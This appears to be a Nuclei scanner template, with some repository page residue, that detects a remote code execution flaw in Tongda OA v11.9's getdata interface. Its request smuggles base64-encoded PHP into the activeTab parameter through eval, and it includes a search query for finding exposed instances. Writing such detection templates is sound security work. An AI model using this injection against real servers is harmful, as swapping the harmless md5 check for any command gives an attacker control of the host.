41 lines
1.5 KiB
YAML
Executable File
41 lines
1.5 KiB
YAML
Executable File
id: tongda-getdata-rce
|
|
|
|
info:
|
|
name: Tongda OA v11.9 getadata - Remote Code Execution
|
|
author: SleepingBag945
|
|
severity: critical
|
|
description: |
|
|
There is an arbitrary command execution vulnerability in the getdata interface of Tongda OA v11.9. An attacker can execute arbitrary commands on the server to control server permissions through the vulnerability.
|
|
reference:
|
|
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.9%20getdata%20%E4%BB%BB%E6%84%8F%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
|
|
classification:
|
|
cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
fofa-query: app="TDXK-通达OA"
|
|
product: office_anywhere
|
|
vendor: tongda2000
|
|
tags: tongda,rce
|
|
|
|
variables:
|
|
num: '999999999'
|
|
payload: "echo md5({{num}});"
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22{{base64(payload)}}%22)))%3B/*&id=19&module=Carouselimage"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- '{{md5(num)}}'
|
|
- 'pagelimit'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a0046304402201d4d1cf96bacfec200fd062855774209a58f8f1848f14d54ed6cb26a16d187f902203e40e4d1b680c4d60704889b34d9494425a570c472554ded330db8863435fdad:922c64590222798bb761d5b6d8e72950 |